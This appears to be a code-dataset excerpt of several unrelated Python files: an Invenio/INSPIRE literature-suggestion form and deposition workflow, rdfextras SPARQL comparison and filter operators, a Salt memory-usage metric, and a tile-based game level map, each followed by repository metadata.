from lxml.html import fromstring
from wtforms.widgets import html_params, HTMLString
from flask_wtf import RecaptchaField
from invenio.modules.deposit.types import SimpleRecordDeposition
from invenio.modules.deposit.form import WebDepositForm
from invenio.base.i18n import _
from invenio.modules.deposit import fields
from invenio.modules.deposit.field_widgets import plupload_widget, \
ColumnInput, \
ExtendedListWidget, \
ItemWidget
from invenio.modules.deposit.tasks import render_form, \
create_recid, \
prepare_sip, \
finalize_record_sip, \
upload_record_sip, \
prefill_draft, \
process_sip_metadata, \
hold_for_approval
from inspire.modules.deposit import fields as inspire_fields
#
# Helpers
#
def filter_empty_helper(keys=None):
    """Return a predicate that keeps non-empty elements (for use with filter).

    For a dict element, the element is kept when at least one value is truthy
    among the keys listed in *keys* (or among all keys when *keys* is None).
    Any other element is kept according to its own truthiness.
    """
    def _inner(elem):
        if not isinstance(elem, dict):
            return bool(elem)
        return any(
            v for k, v in elem.items() if keys is None or k in keys
        )
    return _inner
#
# Field class names
#
# CSS class-name suffixes appended to widget classes so groups of fields can
# be shown/hidden depending on the selected document type (see type_of_doc).
article_class = " article-related"
thesis_class = " thesis-related"
chapter_class = " chapter-related"
book_class = " book-related"
proceedings_class = " proceedings-related"
#
# Custom field widgets
#
def radiochoice_buttons(field, **dummy_kwargs):
    """Render *field*'s choices as a Bootstrap radio button group.

    Bug fixes versus the original markup: each radio used its own per-choice
    ``name`` (per the HTML spec, radios are only mutually exclusive when they
    share one name, so every button formed its own group), and the inputs
    carried no ``value`` attribute, so a submitted form would send "on"
    instead of the chosen value.
    """
    html = ''
    for choice, value in field.choices:
        html += u'<label class="btn btn-default"> \
                 <input type="radio" name="%s" id="%s" value="%s"> \
                 %s</label>' % (field.name, choice, choice, value)
    html = [u'<div class="btn-group" data-toggle="buttons">' + html + u'</div>']
    return HTMLString(u''.join(html))
def importdata_button(field, **dummy_kwargs):
    """Render the "Import data" button that triggers the DOI/arXiv/ISBN
    import (wired up client-side via the "importData" id)."""
    # data-loading-text is Bootstrap's label shown while the button is busy.
    html = u'<button %s data-loading-text="%s">%s</button>' % \
           (html_params(style="float:right; width: 160px;",
                        id="importData",
                        class_="btn btn-primary btn-large",
                        name="importData",
                        type="button"),
            _('Importing data...'),
            field.label.text)
    return HTMLString(html)
def defensedate_widget(field, **kwargs):
    """Date widget for the thesis defense date.

    Renders a text input wired to the site's datepicker, wrapped in the
    thesis-related CSS class so it is only shown for thesis submissions.
    """
    field_id = kwargs.pop('id', field.id)
    # Bug fix: the final closing tag was malformed ("</div></div"), which
    # produced invalid HTML.
    html = [u'<div class="row %s"><div class="col-xs-5 col-sm-3">\
            <input class="datepicker form-control" %s type="text">\
            </div></div>'
            % (thesis_class, html_params(id=field_id,
                                         name=field_id,
                                         value=field.data or ''))]
    return HTMLString(u''.join(html))
#
# Forms
#
class AuthorInlineForm(WebDepositForm):
    """One author row (name + affiliation), repeated inside the dynamic
    author list of LiteratureForm."""
    name = fields.TextField(
        placeholder=_("Family name, First name"),
        widget_classes='form-control',
        widget=ColumnInput(class_="col-xs-6"),
        # validators=[
        #     validators.Required(),
        # ],
        export_key='full_name',
    )
    affiliation = fields.TextField(
        placeholder=_("Affiliation"),
        widget_classes='form-control',
        widget=ColumnInput(class_="col-xs-4 col-pad-0"),
        export_key='affiliation',
    )
class LiteratureForm(WebDepositForm):
    """Literature suggestion form: import identifiers, document type,
    bibliographic data, journal/conference info and fulltext upload."""
    # captcha = RecaptchaField()
    # Identifiers used for pre-filling the form via the "Import data" button.
    doi = fields.DOIField(
        label=_('DOI'),
        icon='fa fa-barcode fa-fw',
        processors=[],
        export_key='doi'
    )
    arxiv_id = fields.TextField(
        label=_('ArXiv ID'),
        widget_classes='form-control',
    )
    isbn = fields.TextField(
        label=_('ISBN'),
        widget_classes='form-control',
    )
    import_source = fields.SubmitField(
        label=_('Import data'),
        widget=importdata_button,
    )
    types_of_doc = [("article", _("Article/Conference paper")),
                    ("thesis", _("Thesis")),
                    ("chapter", _("Book Chapter")),
                    ("book", _("Book")),
                    ("proceedings", _("Proceedings"))]
    type_of_doc = fields.SelectField(
        label='Type of document',
        choices=types_of_doc,
        default="article",
        #widget=radiochoice_buttons,
        widget_classes='form-control',
        validators=[validators.Required()],
        description='Required.',
    )
    title = fields.TitleField(
        label=_('Original Title'),
        description='Required.',
        icon='fa fa-book fa-fw',
        widget_classes="form-control",
        validators=[validators.Required()],
        export_key='title',
    )
    # Repeated AuthorInlineForm rows; at least one author is required.
    authors = fields.DynamicFieldList(
        fields.FormField(
            AuthorInlineForm,
            widget=ExtendedListWidget(
                item_widget=ItemWidget(),
                html_tag='div',
            ),
        ),
        label='Authors',
        add_label='Add another author',
        description='Required.',
        icon='fa fa-user fa-fw',
        min_entries=1,
        widget_classes='',
        export_key='authors',
        validators=[validators.Required()],
    )
    collaboration = fields.TextField(
        label=_('Collaboration'),
        widget_classes="form-control"
    )
    experiment = fields.TextField(
        label=_('Experiment'),
        #choices=,
        widget_classes="form-control"
    )
    # this should be a prefilled dropdown
    subject = fields.TextField(
        label=_('Subject'),
        widget_classes="form-control",
        export_key='subject_term',
    )
    abstract = fields.TextAreaField(
        label=_('Abstract'),
        default='',
        icon='fa fa-pencil fa-fw',
        widget_classes="form-control",
        export_key='abstract',
    )
    page_nr = fields.TextField(
        label=_('Number of pages'),
        widget_classes="form-control",
        export_key='page_nr'
    )
    languages = [("en", _("English")),
                 ("fre", _("French")),
                 ("ger", _("German")),
                 ("dut", _("Dutch")),
                 ("ita", _("Italian")),
                 ("spa", _("Spanish")),
                 ("por", _("Portuguese")),
                 ("gre", _("Greek")),
                 ("slo", _("Slovak")),
                 ("cze", _("Czech")),
                 ("hun", _("Hungarian")),
                 ("pol", _("Polish")),
                 ("nor", _("Norwegian")),
                 ("swe", _("Swedish")),
                 ("fin", _("Finnish")),
                 ("rus", _("Russian"))]
    language = fields.LanguageField(
        label=_("Language"),
        choices=languages
    )
    conf_name = fields.TextField(
        label=_('Conference name'),
        widget_classes="form-control"
    )
    # ==============
    # Thesis related
    # ==============
    supervisors = fields.DynamicFieldList(
        fields.FormField(
            AuthorInlineForm,
            widget=ExtendedListWidget(
                item_widget=ItemWidget(),
                html_tag='div',
            ),
        ),
        label=_('Supervisors'),
        add_label=_('Add another supervisor'),
        icon='fa fa-user fa-fw',
        min_entries=1,
        export_key='supervisors',
        widget_classes=thesis_class,
    )
    defense_date = fields.Date(
        label=_('Date of Defense'),
        description='Format: YYYY-MM-DD.',
        widget=defensedate_widget,
    )
    degree_type = fields.TextField(
        label=_('Degree type'),
        widget_classes="form-control" + thesis_class,
    )
    university = fields.TextField(
        label=_('University'),
        widget_classes="form-control" + thesis_class,
    )
    # ============
    # Journal Info
    # ============
    journal_title = fields.TextField(
        label=_('Journal Title'),
        widget_classes="form-control"
    )
    page_range = fields.TextField(
        label=_('Page range'),
        placeholder=_('1-100'),
        widget_classes="form-control"
    )
    article_id = fields.TextField(
        label=_('Article ID'),
        widget_classes="form-control"
    )
    volume = fields.TextField(
        label=_('Volume'),
        widget_classes="form-control"
    )
    year = fields.TextField(
        label=_('Year'),
        widget_classes="form-control"
    )
    issue = fields.TextField(
        label=_('Issue'),
        widget_classes="form-control"
    )
    # ====================
    # Fulltext Information
    # ====================
    file_field = fields.FileUploadField(
        label="",
        widget=plupload_widget,
        export_key=False
    )
    url = fields.TextField(
        label=_('External URL'),
        #validators=[validators.URL(), validators.Optional, ],
        placeholder=_("http://www.example.com"),
        widget_classes="form-control",
        export_key='url',
    )
    # ok_to_upload = fields.BooleanField(
    #     label=_('I ensure the file is free to be uploaded.'),
    #     default=False,
    #     validators=[required_if('file_field',
    #                             [lambda x: bool(x.strip()), ],  # non-empty
    #                             message="It's required to check this box."
    #                             ),
    #                 required_if('url',
    #                             [lambda x: bool(x.strip()), ],  # non-empty
    #                             message="It's required to check this box."
    #                             ),
    #                 ]
    #     )
    #
    # Form Configuration
    #
    _title = _("Literature suggestion")
    # _subtitle = 'Instructions: (i) Press "Save" to save your upload for '\
    #             'editing later, as many times you like. (ii) Upload or remove'\
    #             ' extra files in the bottom of the form. (iii) When ready, '\
    #             'press "Submit" to finalize your upload. <br><br> If you '\
    #             'already have an <strong>ArXiv</strong> id or a '\
    #             '<strong>DOI</strong>, fill the proper fields and the form '\
    #             'should be automatically completed.'\
    # Group fields in categories
    # NOTE(review): 'captcha' is listed below although the captcha field is
    # commented out above — confirm whether the group entry should be removed.
    groups = [
        ('Import from existing source',
         ['doi', 'arxiv_id', 'isbn', 'import_source'],
         {
             'indication': 'Fill if you have a DOI, ArXiv id or ISBN',
         }),
        ('Document Type',
         ['captcha', 'type_of_doc', ]),
        ('Basic Information',
         ['title', 'authors', 'collaboration', 'experiment', 'abstract',
          'page_nr', 'language', 'subject', 'supervisors', 'defense_date',
          'degree_type', 'university']),
        ('Conference Information',
         ['conf_name']),
        ('Journal Information',
         ['journal_title', 'volume', 'issue', 'page_range', 'article_id',
          'year']),
        ('Proceedings information (not published in journal)',
         []),
        ('Fulltext Information',
         ['file_field', 'url']),
    ]
    field_sizes = {
        'file_field': 'col-md-12',
        'type_of_doc': 'col-xs-4',
    }
#
# Workflow
#
class literature(SimpleRecordDeposition):
    """Literature suggestion deposition.

    Defines the submission workflow and, in :meth:`process_sip_metadata`,
    maps the submitted form fields onto the JSONAlchemy record model.
    """

    workflow = [
        # Pre-fill draft with values passed in from request
        prefill_draft(draft_id='default'),
        # Render form and wait for user to submit
        render_form(draft_id='default'),
        # Create the submission information package by merging form data
        # from all drafts (in this case only one draft exists).
        prepare_sip(),
        # Fills sip with existing ArXiv source
        #harvest_arxiv(),
        # Process metadata to match your JSONAlchemy record model. This will
        # call process_sip_metadata() on your subclass.
        process_sip_metadata(),
        # Reserve a new record id, so that we can provide proper feedback to
        # user before the record has been uploaded.
        create_recid(),
        # Generate MARC based on metadata dictionary.
        finalize_record_sip(is_dump=False),
        # Hold the deposition for admin approval
        hold_for_approval(),
        # Seal the SIP and write MARCXML file and call bibupload on it
        upload_record_sip(),
    ]
    hold_for_upload = False
    name = "Literature"
    name_plural = "Literature depositions"
    group = "Articles & Preprints"
    draft_definitions = {
        'default': LiteratureForm,
    }

    @classmethod
    def process_sip_metadata(cls, deposition, metadata):
        """Map fields to match jsonalchemy configuration.

        Mutates *metadata* in place: restructures abstract/title/authors,
        adds thesis, collection, experiment, conference and publication
        info, then deletes the raw form keys that were folded in.
        """
        # ========
        # Abstract
        # ========
        if 'abstract' in metadata:
            abstract = metadata['abstract']
            metadata['abstract'] = {}
            # Strip HTML markup coming from the rich-text widget.
            metadata['abstract']['abstract'] = fromstring(abstract).text_content()
        # =====
        # Title
        # =====
        title = metadata['title']
        metadata['title'] = {}
        metadata['title']['main'] = title
        # =======
        # Authors
        # =======
        if 'authors' in metadata and metadata['authors']:
            metadata['_first_author'] = metadata['authors'][0]
            metadata['_first_author']['email'] = ''
            if metadata['authors'][1:]:
                metadata['_additional_authors'] = metadata['authors'][1:]
                for k in metadata['_additional_authors']:
                    k['email'] = ''
            del metadata['authors']
        # ===========
        # Supervisors
        # ===========
        if 'supervisors' in metadata and metadata['supervisors']:
            metadata['thesis_supervisor'] = metadata['supervisors'][0]
            metadata['thesis_supervisor']['email'] = ''
        # ==============
        # Thesis related
        # ==============
        if metadata['type_of_doc'] == 'thesis':
            metadata['thesis'] = {}
            metadata['thesis']['date'] = metadata['defense_date']
            metadata['thesis']['university'] = metadata['university']
            metadata['thesis']['type'] = metadata['degree_type']
        # ========
        # Category
        # ========
        metadata['collections'] = {}
        metadata['collections']['primary'] = ['HEP']
        # ==========
        # Experiment
        # ==========
        if 'experiment' in metadata:
            metadata['accelerator_experiment'] = {}
            metadata['accelerator_experiment']['experiment'] = metadata['experiment']
        # ===============
        # Conference Info
        # ===============
        # Bug fix: the form field is 'conf_name'; the original checked
        # 'conf_number', which is never set, so conference submissions never
        # received the nonpublic note or the ConferencePaper collection.
        if 'conf_name' in metadata:
            metadata['nonpublic_note'] = metadata['conf_name']
            metadata['collections']['primary'] += ['ConferencePaper']
        # ================
        # Publication Info
        # ================
        metadata['publication_info'] = {}
        if 'journal_title' in metadata:
            metadata['publication_info']['title'] = metadata['journal_title']
        # Only one of page_range / article_id is expected; page_range wins.
        if 'page_range' in metadata:
            metadata['publication_info']['page_artid'] = metadata['page_range']
        elif 'article_id' in metadata:
            metadata['publication_info']['page_artid'] = metadata['article_id']
        if 'volume' in metadata:
            metadata['publication_info']['journal_volume'] = metadata['volume']
        if 'year' in metadata:
            metadata['publication_info']['year'] = metadata['year']
        if 'issue' in metadata:
            metadata['publication_info']['journal_issue'] = metadata['issue']
        # Drop the raw form keys that were folded into the structures above.
        delete_keys = ['supervisors',
                       'defense_date',
                       'degree_type',
                       'university',
                       'journal_title',
                       'page_range',
                       'article_id',
                       'volume',
                       'year',
                       'issue',
                       'conf_name',
                       'experiment']
        for key in delete_keys:
            if key in metadata:
                del metadata[key]
|
UTF-8
|
Python
| false | false | 2,014 |
5,016,521,819,404 |
5fdf48b7293e1fa3919dfd941391bc5937b005b0
|
bce8c8b0835f1b6fdf33a1aff76cb7e790ae8486
|
/rdfextras/sparql/operators.py
|
417726a8748dcb82ac5d1c3cda680fb3c1d81fa6
|
[
"BSD-3-Clause"
] |
permissive
|
RDFLib/rdfextras
|
https://github.com/RDFLib/rdfextras
|
9e1ab6369ea8b04421cc13843bbb1a5ce0300176
|
c66b30de4a3b9cb67090add06cb8a9cf05d2c545
|
refs/heads/master
| 2023-08-16T04:57:26.503211 | 2013-05-19T14:10:27 | 2013-05-19T14:10:27 | 3,342,174 | 6 | 5 | null | false | 2015-11-05T15:09:16 | 2012-02-03T06:16:14 | 2015-05-15T02:18:21 | 2015-11-05T07:34:15 | 2,557 | 20 | 12 | 1 |
Python
| null | null |
# -*- coding: utf-8 -*-
"""
$Date: 2005/11/04 14:06:36 $, by $Author: ivan $, $Revision: 1.1 $
API for the SPARQL operators.
-----------------------------
The operators (eg, 'lt') return a *function* that can be added to the AND
clause of a query. The parameters are either regular values or query strings.
The resulting function has one parameter (the binding directory), it can be
combined with others or be plugged to into an array of constraints.
For example::
constraints = [lt("?m", 42)]
for checking whether "?m" is smaller than the (integer) value 42. It can be
combined using the lambda function, for example::
constraints = [lambda(b): lt("?m", 42")(b) or lt("?n", 134)(b)]
is the expression for::
AND ?m < 42 || ?n < 134
(Clearly, the relative complexity is only on the API level; a SPARQL
language parser that starts with a SPARQL expression can map on this API).
"""
import sys, re
from rdflib.term import Literal, BNode, URIRef, Variable
from rdflib.namespace import XSD
from rdfextras.sparql.graph import _createResource
from rdfextras.sparql import _questChar, Debug
# We replace str with a custom function below. This messes things up after
# 2to3 conversion, which replaces basestring with str. At some point, we should
# clean this up properly - i.e. don't override the builtin str.
# str_ is the Python 2 base string type used for isinstance checks below.
str_ = basestring
def queryString(v):
    """
    Boolean test whether this is a a query string or not

    :param v: the value to be checked
    :returns: True if it is a query string
    """
    if not isinstance(v, str_):
        return False
    # A query string is non-empty and begins with the query marker ('?').
    return len(v) != 0 and v[0] == _questChar
def getLiteralValue(v):
    """
    Return the value in a literal; on-the-fly datatype conversion is assumed
    to already have happened on the rdflib side (for the implemented
    datatypes), so the literal is handed back unchanged.

    :param v: the Literal to be converted
    :returns: the result of the conversion.
    """
    return v
def getValue(param):
    """
    Returns a *value retrieval function*. The return value can be plugged in a
    query; it would return the value of param directly if param is a real value,
    and the run-time value if param is a query string of the type "?xxx".
    If no binding is defined at the time of call, the return value is None.

    :param param: query string, Unbound instance, or real value
    :returns: a function taking one parameter (the binding directory)
    """
    if isinstance(param,Variable):
        unBound = True
    else:
        unBound = queryString(param)
        if not unBound:
            if isinstance(param, Literal):
                value = getLiteralValue(param)
            elif callable(param):
                # Already a retrieval function: pass it through unchanged.
                return param
            else:
                value = param
            # Python 2 tuple-parameter lambda: closes over the constant value.
            return lambda(bindings): value
    def f(bindings):
        if unBound:
            # @@note, param must be reassigned to avoid tricky issues of scope
            # see: http://docs.python.org/ref/naming.html
            _param = isinstance(param, Variable) and param or Variable(param[1:])
            val = bindings[_param]
            if isinstance(val,Literal):
                return getLiteralValue(val)
            else:
                return val
        else:
            return value
    return f
def lt(a, b):
    """
    Operator for '<'

    :param a: value or query string
    :param b: value or query string
    :returns: comparison method
    """
    left = getValue(a)
    right = getValue(b)
    def compare(bindings):
        try:
            return left(bindings) < right(bindings)
        except:
            # Incompatible operand types: the comparison fails closed.
            if Debug:
                (typ, val, traceback) = sys.exc_info()
                sys.excepthook(typ, val, traceback)
            return False
    return compare
def le(a, b):
    """
    Operator for '<='

    :param a: value or query string
    :param b: value or query string
    :returns: comparison method
    """
    fa = getValue(a)
    fb = getValue(b)
    def f(bindings):
        try:
            return fa(bindings) <= fb(bindings)
        except:
            # this is the case when the operators are incompatible
            if Debug:
                (typ,val,traceback) = sys.exc_info()
                sys.excepthook(typ, val, traceback)
            return False
    return f
def gt(a, b):
    """
    Operator for '>'

    :param a: value or query string
    :param b: value or query string
    :returns: comparison method
    """
    left = getValue(a)
    right = getValue(b)
    def compare(bindings):
        try:
            return left(bindings) > right(bindings)
        except:
            # Incompatible operand types: the comparison fails closed.
            if Debug:
                (typ, val, traceback) = sys.exc_info()
                sys.excepthook(typ, val, traceback)
            return False
    return compare
def ge(a, b):
    """
    Operator for '>='

    :param a: value or query string
    :param b: value or query string
    :returns: comparison method
    """
    left = getValue(a)
    right = getValue(b)
    def compare(bindings):
        try:
            return left(bindings) >= right(bindings)
        except:
            # Incompatible operand types: the comparison fails closed.
            if Debug:
                (typ, val, traceback) = sys.exc_info()
                sys.excepthook(typ, val, traceback)
            return False
    return compare
def eq(a, b):
    """
    Operator for '='

    :param a: value or query string
    :param b: value or query string
    :returns: comparison method
    """
    left = getValue(a)
    right = getValue(b)
    def compare(bindings):
        try:
            return left(bindings) == right(bindings)
        except:
            # Incompatible operand types: the comparison fails closed.
            if Debug:
                (typ, val, traceback) = sys.exc_info()
                sys.excepthook(typ, val, traceback)
            return False
    return compare
def neq(a, b):
    """
    Operator for '!='

    :param a: value or query string
    :param b: value or query string
    :returns: comparison method
    """
    left = getValue(a)
    right = getValue(b)
    def compare(bindings):
        try:
            return left(bindings) != right(bindings)
        except:
            # Incompatible operand types: the comparison fails closed.
            if Debug:
                (typ, val, traceback) = sys.exc_info()
                sys.excepthook(typ, val, traceback)
            return False
    return compare
def __getVariableName(v):
    """Return the variable name for *v*, or None when it is not a variable.

    A Variable instance is returned as-is; a "?xxx" query string yields
    "xxx"; anything else yields None.
    """
    if isinstance(v, Variable):
        return v
    if queryString(v):
        return v[1:]
    return None
def bound(a):
    """
    Is the variable bound

    :param a: value or query string
    :returns: check method
    """
    name = __getVariableName(a)
    def check(bindings):
        if name == None:
            return False
        if name not in bindings:
            return False
        # A binding of None counts as unbound.
        return not (bindings[name] == None)
    return check
def isURI(a):
    """
    Is the variable bound to a URIRef

    :param a: value or query string
    :returns: check method
    """
    name = __getVariableName(a)
    def check(bindings):
        if name == None:
            return False
        try:
            val = bindings[name]
        except:
            # Missing binding: not a URI.
            return False
        if val == None:
            return False
        return isinstance(val, URIRef)
    return check
def isIRI(a):
    """
    Is the variable bound to a IRIRef (this is just an alias for URIRef)

    :param a: value or query string
    :returns: check method
    """
    # IRIs are represented with URIRef in rdflib, so delegate directly.
    return isURI(a)
def isBlank(a):
    """
    Is the variable bound to a Blank Node

    :param a: value or query string
    :returns: check method
    """
    name = __getVariableName(a)
    def check(bindings):
        if name == None:
            return False
        try:
            val = bindings[name]
        except:
            # Missing binding: not a blank node.
            return False
        if val == None:
            return False
        return isinstance(val, BNode)
    return check
def isLiteral(a):
    """
    Is the variable bound to a Literal

    :param a: value or query string
    :returns: check method
    """
    name = __getVariableName(a)
    def check(bindings):
        if name == None:
            return False
        try:
            val = bindings[name]
        except:
            # Missing binding: not a literal.
            return False
        if val == None:
            return False
        return isinstance(val, Literal)
    return check
def str(a):
    """
    Return the string version of a resource

    :param a: value or query string
    :returns: check method
    """
    # NOTE: intentionally shadows the builtin str -- this module implements
    # the SPARQL str() operator; the real builtin is re-imported as _str below.
    v = __getVariableName(a)
    def f(bindings):
        if v == None:
            return ""
        try:
            val = bindings[v]
            if val == None:
                return ""
            else:
                # Python 2 builtin namespace; recovers the shadowed builtin.
                from __builtin__ import str as _str
                return _str(val)
        except:
            # Missing binding: empty string per the fail-soft convention here.
            return ""
    return f
def lang(a):
    """Return the lang value of a literal

    :param a: value or query string
    :returns: check method
    """
    name = __getVariableName(a)
    def check(bindings):
        if name == None:
            return ""
        try:
            val = bindings[name]
            if val == None or val.language == None:
                return ""
            return val.language
        except:
            # Missing binding: empty string per the fail-soft convention here.
            return ""
    return check
def langmatches(lang, _range):
    """SPARQL langMatches: build a check matching a language tag to a range."""
    tag_value = getValue(lang)
    range_value = getValue(_range)
    def check(bindings):
        if tag_value == None or range_value == None:
            return False
        return _langMatch(tag_value(bindings), range_value(bindings))
    return check
def _langMatch(lang, _range):
"""
Borrowed from http://dev.w3.org/2004/PythonLib-IH/RDFClosure/RestrictedDatatype.py
Author: Ivan Herman
Implementation of the extended filtering algorithm, as defined in
point 3.3.2, of `RFC 4647 <http://www.rfc-editor.org/rfc/rfc4647.txt>`_,
on matching language ranges and language tags.
Needed to handle the C{rdf:PlainLiteral} datatype.
:param range: language range
:param lang: language tag
:returns: boolean
"""
def _match(r, l):
"""Matching of a range and language item: either range is a wildcard
or the two are equal
:param r: language range item
:param l: language tag item
:rtype: boolean
"""
return r == '*' or r == l
rangeList = _range.strip().lower().split('-')
langList = lang.strip().lower().split('-')
if not _match(rangeList[0], langList[0]): return False
rI = 1
rL = 1
while rI < len(rangeList):
if rangeList[rI] == '*':
rI += 1
continue
if rL >= len(langList):
return False
if _match(rangeList[rI], langList[rL]):
rI += 1
rL += 1
continue
if len(langList[rL]) == 1:
return False
else:
rL += 1
continue
return True
def datatype(a):
    """Return the datatype URI of a literal

    :param a: value or query string
    :returns: check method (raises TypeError when the bound value is not a
        plain-datatype Literal, per the SPARQL DATATYPE() operator)
    """
    v = __getVariableName(a)
    def f(bindings):
        if v == None:
            if isinstance(a, Literal):
                return a.datatype
            else:
                raise TypeError(a)
        try :
            val = bindings[v]
            if val == None:
                # Bug fix: the original *returned* TypeError(v) instead of
                # raising it, handing callers an exception instance as if it
                # were a datatype URI.
                raise TypeError(v)
            elif isinstance(val, Literal) and not val.language:
                return val.datatype
            else:
                raise TypeError(val)
        except:
            # Any failure (missing binding included) is a type error.
            raise TypeError(v)
    return f
def isOnCollection(collection, item, triplets):
    """
    Generate a method usable as a global constraint in sparql to check
    whether 'item' is an element of 'collection' (a.k.a. list). Both
    collection and item can be a real resource or a query string; item may
    also be a plain value that is turned into a Literal at build time.

    :param collection: query string (bound by the query) or an RDFLib
        Resource representing the collection
    :param item: query string (bound by the query), an RDFLib Resource, or a
        data type value converted to a corresponding Literal that must be
        tested for membership in the collection
    :returns: a function
    """
    # Decide whether the collection is resolved at query time (variable /
    # query string) or is a concrete resource.
    if isinstance(collection, Variable):
        collIsQuery = True
    elif queryString(collection):
        collIsQuery = True
    else:
        collIsQuery = False

    # Same decision for the item; concrete values are converted to an RDF
    # resource up front (raises if the value is invalid).
    if isinstance(item, Variable) or queryString(item):
        queryItem = item
        itemIsQuery = True
    else:
        queryItem = _createResource(item)
        itemIsQuery = False

    def checkCollection(bindings):
        try:
            coll = bindings[collection] if collIsQuery else collection
            it = bindings[queryItem] if itemIsQuery else queryItem
            return it in triplets.items(coll)
        except:
            # A missing binding means the constraint was used with e.g.
            # optional triplets; it must not become a show-stopper there,
            # hence True.
            return True
    return checkCollection
def addOperator(args, combinationArg):
    """
    SPARQL numeric + operator implemented via Python: build the source
    snippet summing the values of *args* through sparqlOperators.getValue,
    optionally applied to *combinationArg*.
    """
    suffix = "(%s)" % combinationArg if combinationArg else ''
    terms = ["sparqlOperators.getValue(%s)%s" % (arg, suffix) for arg in args]
    return ' + '.join(terms)
def XSDCast(source, target=None):
    """
    XSD Casting/Construction Support

    Builds a function that, given the bindings, yields a Literal carrying
    the lexical value of *source* with datatype *target*; a Literal already
    of the target datatype is returned unchanged. (This may be an issue
    since Literal doesn't override comparisons.)
    """
    sourceF = getValue(source)
    def cast(bindings):
        value = sourceF(bindings)
        if isinstance(value, Literal) and value.datatype == target:
            # Literal already has target datatype
            return value
        return Literal(value, datatype=target)
    return cast
def regex(item, pattern, flag=None):
    """
    Invokes the XPath fn:matches function to match text against a regular
    expression pattern.

    The regular expression language is defined in XQuery 1.0 and XPath 2.0
    Functions and Operators section 7.6.1 Regular Expression Syntax

    :param item: value or query string to be tested
    :param pattern: regular expression (value or query string)
    :param flag: optional XPath flag string (any of 'i', 's', 'm')
    :returns: a function taking the bindings and returning a bool
    """
    a = getValue(item)
    b = getValue(pattern)
    if flag:
        cFlag = 0
        usedFlags = []
        # Maps XPath REGEX flags (http://www.w3.org/TR/xpath-functions/#flags)
        # to Python's re flags
        for fChar,_flag in [
            ('i', re.IGNORECASE), ('s', re.DOTALL), ('m', re.MULTILINE)]:
            if fChar in flag and fChar not in usedFlags:
                cFlag |= _flag
                usedFlags.append(fChar)
        def f1(bindings):
            try:
                return bool(re.compile(b(bindings),cFlag).search(a(bindings)))
            except:
                # Bad pattern or missing binding: the match fails closed.
                return False
        return f1
    else:
        def f2(bindings):
            try:
                return bool(re.compile(b(bindings)).search(a(bindings)))
            except:
                # Bad pattern or missing binding: the match fails closed.
                return False
        return f2
    # Bug fix: the original ended with an unreachable fallback closure that
    # additionally swapped the item/pattern arguments; it has been removed.
def EBV(a):
"""
* If the argument is a typed literal with a datatype of xsd:boolean,
the EBV is the value of that argument.
* If the argument is a plain literal or a typed literal with a
datatype of xsd:string, the EBV is false if the operand value
has zero length; otherwise the EBV is true.
* If the argument is a numeric type or a typed literal with a datatype
derived from a numeric type, the EBV is false if the operand value is
NaN or is numerically equal to zero; otherwise the EBV is true.
* All other arguments, including unbound arguments, produce a type error.
"""
fa = getValue(a)
def f(bindings):
try:
rt = fa(bindings)
if isinstance(rt, Literal):
if rt.datatype == XSD.boolean:
ebv = rt.toPython()
elif rt.datatype == XSD.string or rt.datatype is None:
ebv = len(rt) > 0
else:
pyRT = rt.toPython()
if isinstance(pyRT,Literal):
#Type error, see: http://www.w3.org/TR/rdf-sparql-query/#ebv
raise TypeError("http://www.w3.org/TR/rdf-sparql-query/#ebv")
else:
ebv = pyRT != 0
return ebv
else:
print rt, type(rt)
raise
except Exception, e:
if isinstance(e, KeyError):
# see: http://www.w3.org/TR/rdf-sparql-query/#ebv
raise TypeError("http://www.w3.org/TR/rdf-sparql-query/#ebv")
# this is the case when the operators are incompatible
raise
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
|
UTF-8
|
Python
| false | false | 2,013 |
9,509,057,639,810 |
82ad802f7b7abfb34c60560dc3164319f197a8bb
|
35d1804b49ac3339ba07222764e25656163141b4
|
/Openstack_Havana/file/_modules/metric_memory.py
|
178df9cb6ec96b18286cf89e8d9abb393f95ddff
|
[] |
no_license
|
pyinx/openstack-automation
|
https://github.com/pyinx/openstack-automation
|
e5bb8e38fd5cf999cc036af1b882e67c27b6b352
|
ba26b0ae82a1b1f943a1983e63f3b6a47233fdf2
|
refs/heads/master
| 2017-04-26T20:18:05.616212 | 2013-12-24T09:33:26 | 2013-12-24T09:33:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def utilize():
    """Return memory utilization (percent) from salt's status.meminfo data,
    or None when no data is available."""
    meminfo = __salt__['status.meminfo']()
    if not meminfo:
        return None
    stats = {
        'total': float(meminfo['MemTotal']['value']),
        'free': float(meminfo['MemFree']['value']),
    }
    return _calculate(stats)
def _calculate(info):
active = info['total'] - info['free']
val = (active / info['total']) * 100.0
return val
|
UTF-8
|
Python
| false | false | 2,013 |
19,241,453,520,014 |
fac61be2545d5004fc5d03a974f86bf73e40f460
|
d4387db5d2688f6b4e8c750b2d42497495aed9c9
|
/jouletheif/lvl/lvl_deco.py
|
c3ec75e7191591ebb31aca8eb07763dcbbc32033
|
[] |
no_license
|
602p/JouleThief
|
https://github.com/602p/JouleThief
|
d5e592d327e413e77bf82f381d0d3b9e8cb49cae
|
557dcc10573cfd4389f4873565c57d7a862314bc
|
refs/heads/master
| 2018-05-03T01:59:15.095015 | 2013-06-09T20:30:33 | 2013-06-09T20:30:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Maps level-map characters to constructor template strings; %1%/%2% are
# placeholders presumably filled with the tile's coordinates by the level
# loader -- TODO confirm against the loader code.
_lvl_map={"#":"Platform(%1%, %2%)", "W":"WinPlatform(%1%, %2%)", "1":"DecorationPlatform(%1%, %2%, 'image/checker_tile.png')"}
_lvl_level=[
"########################################",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# 1 #",
"# 1 #",
"# 1 #",
"# #",
"# 1 #",
"# #",
"# 1 #",
"########################################"
]
# Starting position in pixels (tile coordinates times a 16px tile size).
setx=1*16
sety=27*16
|
UTF-8
|
Python
| false | false | 2,013 |
3,848,290,714,932 |
879353d997890fde3914f4688521077466ff9b86
|
6c94256295aea60d592b893b78bffe3c6adb923a
|
/apio/index/__init__.py
|
9eb7a4e01e4d1485a344a746656375b00de43a0b
|
[
"MIT"
] |
permissive
|
paolo-g/python-apio
|
https://github.com/paolo-g/python-apio
|
805453782f06441899645931f31a7e7eb39734bb
|
12e6ff834efc62c6e9ce0b119ef0a424aea6506a
|
refs/heads/master
